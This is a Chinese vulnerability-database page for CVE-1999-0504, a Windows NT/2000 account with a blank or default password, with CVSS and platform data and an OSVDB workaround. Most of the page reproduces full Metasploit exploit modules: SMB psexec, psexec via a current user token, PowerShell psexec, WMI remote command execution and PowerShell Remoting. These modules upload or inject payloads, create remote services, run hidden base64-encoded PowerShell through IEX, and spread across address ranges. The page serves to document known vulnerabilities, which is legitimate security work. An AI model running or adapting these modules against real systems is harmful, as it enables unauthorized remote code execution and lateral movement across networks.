CVE-1999-0504
CVSS7.5
发布时间 :1997-01-01 00:00:00
修订时间 :2008-09-09 08:34:56
NMCOEP    

[原文]A Windows NT local user or administrator account has a default, null, blank, or missing password.


[CNNVD]Windows NT账户加密漏洞(CNNVD-199701-020)

        Windows NT存在漏洞。本地用户或管理者账户有一个默认的、无效的、空白的或者缺失的密码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:microsoft:windows_ntMicrosoft Windows NT

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0504
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0504
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199701-020
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Windows NT账户加密漏洞
高危 未知
1997-01-01 00:00:00 2005-10-20 00:00:00
远程  
        Windows NT存在漏洞。本地用户或管理者账户有一个默认的、无效的、空白的或者缺失的密码。

- 公告与补丁

        

- 漏洞信息 (16374)

Microsoft Windows Authenticated User Code Execution (EDBID:16374)
windows remote
2010-12-02 Verified
0 metasploit
N/A [点击下载]
##
# $Id: psexec.rb 11204 2010-12-02 17:29:26Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


=begin
Windows XP systems that are not part of a domain default to treating all
network logons as if they were Guest. This prevents SMB relay attacks from
gaining administrative access to these systems. This setting can be found
under:

	Local Security Settings >
	 Local Policies >
	  Security Options >
	   Network Access: Sharing and security model for local accounts
=end

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Remote::SMB::Authenticated
	include Msf::Auxiliary::Report
	include Msf::Exploit::EXE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Windows Authenticated User Code Execution',
			'Description'    => %q{
					This module uses a valid administrator username and password (or
				password hash) to execute an arbitrary payload. This module	is similar
				to the "psexec" utility provided by SysInternals. Unfortunately, this
				module is not able to clean up after itself. The service and payload
				file listed in the output will need to be manually removed after access
				has been gained. The service created by this tool uses a randomly chosen
				name and description, so the services list can become cluttered after
				repeated exploitation.
			},
			'Author'         =>
				[
					'hdm',
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11204 $',
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'WfsDelay'     => 10,
					'EXITFUNC' => 'process'
				},
			'References'     =>
				[
					[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
					[ 'OSVDB', '3106'],
					[ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ]
				],
			'Payload'        =>
				{
					'Space'        => 2048,
					'DisableNops'  => true,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			# For the CVE, PsExec was first released around February or March 2001
			'DisclosureDate' => 'Jan 01 1999'
		))

		register_advanced_options(
			[
				OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true])
			], self.class)
	end

	def exploit

		print_status("Connecting to the server...")
		connect()

		print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
		smb_login()

		if (not simple.client.auth_user)
			print_line(" ")
			print_error(
				"FAILED! The remote host has only provided us with Guest privileges. " +
				"Please make sure that the correct username and password have been provided. " +
				"Windows XP systems that are not part of a domain will only provide Guest privileges " +
				"to network logins by default."
			)
			print_line(" ")
			disconnect
			return
		end

		if datastore['DB_REPORT_AUTH']
			report_hash = {
				:host	=> datastore['RHOST'],
				:port   => datastore['RPORT'],
				:sname	=> 'smb',
				:user	=> datastore['SMBUser'],
				:pass	=> datastore['SMBPass'],
				:active => true
			}
			if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
				report_hash.merge!({:type => 'smb_hash'})
			else
				report_hash.merge!({:type => 'password'})
			end
			report_auth_info(report_hash)
		end

		filename = rand_text_alpha(8) + ".exe"
		servicename = rand_text_alpha(8)

		# Upload the shellcode to a file
		print_status("Uploading payload...")
		simple.connect("ADMIN$")
		fd = simple.open("\\#{filename}", 'rwct')

		exe = ''
		opts = { :servicename => servicename }
		if (datastore['PAYLOAD'].include? 'x64')
			opts.merge!({ :arch => ARCH_X64 })
		end
		exe = generate_payload_exe_service(opts)

		fd << exe
		fd.close

		print_status("Created \\#{filename}...")

		# Disconnect from the ADMIN$
		simple.disconnect("ADMIN$")

		# Connect to the IPC service
		simple.connect("IPC$")


		# Bind to the service
		handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		##
		# OpenSCManagerW()
		##

		print_status("Obtaining a service manager handle...")
		scm_handle = nil
		stubdata =
			NDR.uwstring("\\\\#{rhost}") +
			NDR.long(0) +
			NDR.long(0xF003F)
		begin
			response = dcerpc.call(0x0f, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				scm_handle = dcerpc.last_response.stub_data[0,20]
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
			return
		end

		##
		# CreateServiceW()
		##

		displayname = 'M' + rand_text_alpha(rand(32)+1)
		svc_handle  = nil
		svc_status  = nil

		print_status("Creating a new service (#{servicename} - \"#{displayname}\")...")
		stubdata =
			scm_handle +
			NDR.wstring(servicename) +
			NDR.uwstring(displayname) +

			NDR.long(0x0F01FF) + # Access: MAX
			NDR.long(0x00000110) + # Type: Interactive, Own process
			NDR.long(0x00000003) + # Start: Demand
			NDR.long(0x00000000) + # Errors: Ignore

			NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
			NDR.long(0) + # LoadOrderGroup
			NDR.long(0) + # Dependencies
			NDR.long(0) + # Service Start
			NDR.long(0) + # Password
			NDR.long(0) + # Password
			NDR.long(0) + # Password
			NDR.long(0)  # Password
		begin
			response = dcerpc.call(0x0c, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				svc_handle = dcerpc.last_response.stub_data[0,20]
				svc_status = dcerpc.last_response.stub_data[24,4]
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
			return
		end

		##
		# CloseHandle()
		##
		print_status("Closing service handle...")
		begin
			response = dcerpc.call(0x0, svc_handle)
		rescue ::Exception
		end

		##
		# OpenServiceW
		##
		print_status("Opening service...")
		begin
			stubdata =
				scm_handle +
				NDR.wstring(servicename) +
				NDR.long(0xF01FF)

			response = dcerpc.call(0x10, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				svc_handle = dcerpc.last_response.stub_data[0,20]
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
			return
		end

		##
		# StartService()
		##
		print_status("Starting the service...")
		stubdata =
			svc_handle +
			NDR.long(0) +
			NDR.long(0)
		begin
			response = dcerpc.call(0x13, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
			return
		end

		##
		# DeleteService()
		##
		print_status("Removing the service...")
		stubdata =
			svc_handle
		begin
			response = dcerpc.call(0x02, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
		end

		##
		# CloseHandle()
		##
		print_status("Closing service handle...")
		begin
			response = dcerpc.call(0x0, svc_handle)
		rescue ::Exception => e
			print_error("Error: #{e}")
		end

		begin
			print_status("Deleting \\#{filename}...")
			select(nil, nil, nil, 1.0)
			simple.connect("ADMIN$")
			simple.delete("\\#{filename}")
		rescue ::Interrupt
			raise $!
		rescue ::Exception
		end

		handler
		disconnect
	end
end

		

- 漏洞信息 (F115238)

Psexec Via Current User Token (PacketStormID:F115238)
2012-08-03 00:00:00
Jabra,egypt  metasploit.com
exploit,remote
CVE-1999-0504,OSVDB-3106
[点击下载]

This Metasploit module uploads an executable file to the victim system, creates a share containing that executable, creates a remote service on each target system using a UNC path to that file, and finally starts the service(s). The result is similar to psexec but with the added benefit of using the session's current authentication token instead of having to know a password or hash.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/services'

class Metasploit3 < Msf::Exploit::Local
	include Post::Windows::WindowsServices
	include Exploit::EXE
	include Post::File
	include Post::Common

	def initialize(info={})
		super( update_info( info,
				'Name'          => 'Psexec via Current User Token',
				'Description'   => %q{
					This module uploads an executable file to the victim system, creates
					a share containing that executable, creates a remote service on each
					target system using a UNC path to that file, and finally starts the
					service(s).

					The result is similar to psexec but with the added benefit of using
					the session's current authentication token instead of having to know
					a password or hash.
				},
				'License'       => MSF_LICENSE,
				'Author'        => [
						'egypt',
						'jabra'  # Brainstorming and help with original technique
					],
				'References'    => [
						# same as for windows/smb/psexec
						[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
						[ 'OSVDB', '3106'],
						[ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ]
					],
				'Version'       => '$Revision$',
				'Platform'      => [ 'windows' ],
				'SessionTypes'  => [ 'meterpreter' ],
				'Targets' => [ [ 'Universal', {} ] ],
				'DefaultTarget' => 0
			))

		register_options([
			OptString.new("INTERNAL_ADDRESS", [
				false,
				"Session's internal address or hostname for the victims to grab the "+
				"payload from (Default: detected)"
				]),
			OptString.new("NAME",     [ false, "Service name on each target in RHOSTS (Default: random)" ]),
			OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
			OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
		])
	end

	def exploit
		name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
		display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)

		# XXX Find the domain controller

		#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
		share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
		print_status "Using #{share_host} as the internal address for victims to get the payload from"

		# Build a random name for the share and directory
		share_name = Rex::Text.rand_text_alphanumeric(8)
		drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
		share_dir = "#{drive}\\#{share_name}"

		# Create them
		print_status("Creating share #{share_dir}")
		session.fs.dir.mkdir(share_dir)
		cmd_exec("net share #{share_name}=#{share_dir}")

		# Generate an executable from the shellcode and drop it in the share
		# directory
		filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
		payload_exe = generate_payload_exe_service(
			:servicename => name,
			# XXX Ghetto
			:arch => payload.send(:pinst).arch.first
		)

		print_status("Dropping payload #{filename}")
		write_file("#{share_dir}\\#{filename}", payload_exe)

		service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"

		begin
			Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
				begin
					print_status("#{server.ljust(16)} Creating service #{name}")

					# 3 is Manual startup. Should probably have constants for this junk
					service_create(name, display_name, service_executable, 3, server)

					# If everything went well, this will create a session. If not, it
					# might be permissions issues or possibly we failed to create the
					# service.
					print_status("#{server.ljust(16)} Starting the service")
					service_start(name, server)

					print_status("#{server.ljust(16)} Deleting the service")
					service_delete(name, server)
				rescue
					print_error("Exception running payload: #{$!.class} : #{$!}")
					print_error("#{server.ljust(16)} WARNING: May have failed to clean up!")
					print_error("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
					next
				end
			end
		ensure
			print_status("Deleting share #{share_name}")
			cmd_exec("net share #{share_name} /delete /y")
			print_status("Deleting files #{share_dir}")
			cmd_exec("cmd /c rmdir /q /s #{share_dir}")
		end

	end

end

    

- 漏洞信息 (F122390)

Microsoft Windows Authenticated Powershell Command Execution (PacketStormID:F122390)
2013-07-13 00:00:00
RageLtMan,Royce Davis  metasploit.com
exploit,shellcode
CVE-1999-0504,OSVDB-3106
[点击下载]

This Metasploit module uses a valid administrator username and password to execute a powershell payload using a similar technique to the "psexec" utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the -encodedcommand flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. Since executing shellcode in .NET requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture must match that of the payload. Lastly, a persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the process entirely.

# -*- coding: binary -*-

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	# Exploit mixins should be called first
	include Msf::Exploit::Remote::SMB::Psexec
	include Msf::Exploit::Powershell

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
			'Description'    => %q{
					This module uses a valid administrator username and password to execute a powershell
				payload using a similar technique to the "psexec" utility provided by SysInternals. The
				payload is encoded in base64 and executed from the commandline using the -encodedcommand
				flag. Using this method, the payload is never written to disk, and given that each payload
				is unique, is less prone to signature based detection. Since executing shellcode in .NET
				requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
				must match that of the payload. Lastly, a persist option is provided to execute the payload
				in a while loop in order to maintain a form of persistence. In the event of a sandbox
				observing PSH execution, a delay and other obfuscation may be added to avoid detection.
				In order to avoid interactive process notifications for the current user, the psh payload has
				been reduced in size and wrapped in a powershell invocation which hides the process entirely.
			},

			'Author'         => [
				'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
				'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
			],

			'License'        => MSF_LICENSE,
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'WfsDelay'     => 10,
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'        => 8192,
					'DisableNops'  => true,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
					[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jan 01 1999',
			'References'     => [
				[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
				[ 'OSVDB', '3106'],
				[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
				[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
				[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
			]
		))
	end

	def exploit
		command = cmd_psh_payload(payload.encoded)

		if datastore['PERSIST'] and not datastore['DisablePayloadHandler']
			print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.")
		end

		if datastore['RUN_WOW64'] and target_arch.first == "x86_64"
			fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
		end

		# Try and authenticate with given credentials
		if connect
			begin
				smb_login
			rescue StandardError => autherror
				disconnect
				fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
			end
			# Execute the powershell command
			print_status("#{peer} - Executing the payload...")
			begin
				return psexec(command)
			rescue StandardError => exec_command_error
				disconnect
				fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
			end
		end
	end

	def peer
		return "#{rhost}:#{rport}"
	end
end

    

- 漏洞信息 (F123729)

Windows Management Instrumentation (WMI) Remote Command Execution (PacketStormID:F123729)
2013-10-23 00:00:00
Ben Campbell  metasploit.com
exploit,remote,tcp
windows
CVE-1999-0504,OSVDB-3106
[点击下载]

This Metasploit module executes powershell on the remote host using the current user credentials or those supplied. Instead of using PSEXEC over TCP port 445 we use the WMIC command to start a Remote Procedure Call on TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel traffic through that session. The result is similar to psexec but with the added benefit of using the session's current authentication token instead of having to know a password or hash. We do not get feedback from the WMIC command so there are no indicators of success or failure. The remote host must be configured to allow remote Windows Management Instrumentation.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell

  def initialize(info={})
    super( update_info( info,
        'Name'          => 'Windows Management Instrumentation (WMI) Remote Command Execution',
        'Description'   => %q{
          This module executes powershell on the remote host using the current
          user credentials or those supplied. Instead of using PSEXEC over TCP
          port 445 we use the WMIC command to start a Remote Procedure Call on
          TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
          traffic through that session.

          The result is similar to psexec but with the added benefit of using
          the session's current authentication token instead of having to know
          a password or hash.

          We do not get feedback from the WMIC command so there are no
          indicators of success or failure. The remote host must be configured
          to allow remote Windows Management Instrumentation.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
          ],
        'References'    =>
          [
            [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
            [ 'OSVDB', '3106'],
            [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
          ],
        'DefaultOptions' =>
            {
                'EXITFUNC' => 'thread',
                'WfsDelay' => '15',
            },
        'DisclosureDate' => 'Jan 01 1999',
        'Platform'      => [ 'win' ],
        'SessionTypes'  => [ 'meterpreter' ],
        'Targets'	=>
        [
            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
            [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
        'DefaultTarget' => 0
      ))

    register_options([
      OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
      OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ]),
      OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
      # Move this out of advanced
      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
    ])
  end

  def exploit
    if datastore['SMBUser'] and datastore['SMBPass'].nil?
      fail_with(Failure::BadConfig, "Need both username and password set.")
    end

    Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
      # TODO: CHECK WMIC Access by reading the clipboard?
      # TODO: wmic /output:clipboard
      # TODO: Needs to be meterpreter ext side due to threading

      # Get the PSH Payload and split it into bitesize chunks
      # 1024 appears to be the max value allowed in env vars
      psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
      psh = psh[psh.index("$si")..psh.length-1]
      chunks = split_code(psh, 1024)

      begin
        print_status("[#{server}] Storing payload in environment variables")
        env_name = rand_text_alpha(rand(3)+3)
        env_vars = []
        0.upto(chunks.length-1) do |i|
          env_vars << "#{env_name}#{i}"
          c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
          wmic_command(server, c)
        end

        x = rand_text_alpha(rand(3)+3)
        exec_cmd = "powershell.exe -nop -w hidden -c $#{x} = ''"
        env_vars.each do |env|
          exec_cmd << "+$env:#{env}"
        end
        exec_cmd << ";IEX $#{x};"

        print_status("[#{server}] Executing payload")
        wmic_command(server, exec_cmd)

        print_status("[#{server}] Cleaning up environment variables")
        env_vars.each do |env|
          cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
          wmic_command(server, cleanup_cmd)
        end
      rescue Rex::Post::Meterpreter::RequestError => e
        print_error("[#{server}] Error moving on... #{e}")
        next
      ensure
        select(nil,nil,nil,2)
      end
    end
  end

  def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
    userpass = ""

    unless user.nil?
      if domain.nil?
        userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
      else
        userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
      end
    end

    return userpass
  end

  def wmic_command(server, cmd)
    wcmd = "wmic #{wmic_user_pass_string}/node:#{server} process call create \"#{cmd.gsub('"','\\"')}\""
    vprint_status("[#{server}] #{wcmd}")

    # We dont use cmd_exec as WMIC cannot be Channelized
    ps = session.sys.process.execute(wcmd, "", {'Hidden' => true, 'Channelized' => false})
    select(nil,nil,nil,0.1)
  end

  def split_code(psh, chunk_size)
    array = []
    idx = 0
    while (idx < psh.length)
      array << psh[idx, chunk_size]
      idx += chunk_size
    end
    return array
  end

end

    

- 漏洞信息 (F130975)

Powershell Remoting Remote Command Execution (PacketStormID:F130975)
2015-03-24 00:00:00
Ben Campbell  metasploit.com
exploit,tcp
CVE-1999-0504,OSVDB-3106
[点击下载]

This Metasploit module uses Powershell Remoting (TCP 47001) to inject payloads on target machines. If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise use a HOSTFILE to supply a list of known hostnames.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
          'Name'          => 'Powershell Remoting Remote Command Execution',
          'Description'   => %q{
            Uses Powershell Remoting (TCP 47001) to inject payloads on target machines.
          If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise
          use a HOSTFILE to supply a list of known hostnames.
          },
          'License'       => MSF_LICENSE,
          'Author'        => [ 'Ben Campbell' ],
          'References'    =>
            [
              [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
              [ 'OSVDB', '3106']
            ],
          'DefaultOptions' =>
              {
                'EXITFUNC' => 'thread'
              },
          'DisclosureDate' => 'Jan 01 1999',
          'Platform'      => [ 'win' ],
          'SessionTypes'  => [ 'meterpreter', 'shell' ],
          'Targets' =>
          [
            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
          ],
          'DefaultTarget' => 0
      ))

    register_options([
      OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
      OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ]),
      OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
      OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]),
      # Move this out of advanced
      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
      OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ])
    ])

    register_advanced_options(
      [
        OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60])
      ], self.class)
  end

  def exploit
    if !datastore['ExitOnSession'] && !job_id
      fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
    end

    unless datastore['RHOSTS'] || datastore['HOSTFILE']
      fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.")
    end

    if datastore['SMBUser'] && datastore['SMBPass'].nil?
      fail_with(Failure::BadConfig, "Need both username and password set.")
    end

    if datastore['RHOSTS']
      ip_list = "$iplist="
      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip|
        ip_list << "'#{ip}',"
      end

      # Remove trailing comma...
      ip_list = ip_list[0..-2]
      ip_list << ";"
    end

    known_hosts = ""
    if datastore['HOSTFILE']
      ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
        hostname.strip!
        known_hosts << "'#{hostname}'," unless hostname.blank?
      end
      known_hosts = known_hosts[0..-2]
    end

    command = cmd_psh_payload(payload.encoded,
                              payload_instance.arch.first,
                              encode_final_payload: true,
                              remove_comspec: true)

    ps = <<EOF
#{generate_credentials}
$ResultList=@(#{known_hosts});
#{ip_list}
foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
EOF

    if datastore['SMBUser']
      ps << " -Credential $creds"
    end

    # If the host process terminates too quickly the jobs will die
    # before they spawn in a new process.
    ps << ";Sleep 20;"
    ps.gsub!("\n", "")

    command = generate_psh_command_line(
      noprofile: true,
      windowstyle: 'hidden',
      command: ps
    )

    print_status("Executing command...")
    begin
      cmd_exec(command)
    rescue Rex::TimeoutError
    end

    stime = Time.now.to_f
    loop do
      break if session_created? && datastore['ExitOnSession']
      break if  datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f)

      Rex.sleep(1)
    end

    print_status("Completed")
  end

  def generate_credentials(domain = datastore['SMBDomain'], user = datastore['SMBUser'], pass = datastore['SMBPass'])
    creds = ""

    unless user.nil?
      creds = "$pass=ConvertTo-SecureString -string '#{pass}' -asPlainText -force;"\
      "$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist "
      if domain.nil?
        creds << "'#{user}'"
      else
        creds << "'#{domain}\\#{user}'"
      end

      creds << ",$pass;"
    end

    creds
  end
end
    

- 漏洞信息

10050
IBM OEM Windows XP Home Default Hidden Administrator Account
Physical Access Required Authentication Management
Loss of Integrity
Exploit Public

- 漏洞描述

The OEM version of Windows XP Home from IBM contains a flaw that may allow a malicious user to arbitrary manipulate a system. The problem is that the product contains a default hidden administrator account with a blank password. It is possible that the flaw may allow arbitrary system manipulation resulting in a loss of integrity.

- 时间线

2004-09-15 2004-08-06
2004-09-15 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Under control panel, go to Administrative Tools. Open Computer Management. Go to System Tools->Local Users and Groups->Users. Set a password for the administrator account.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站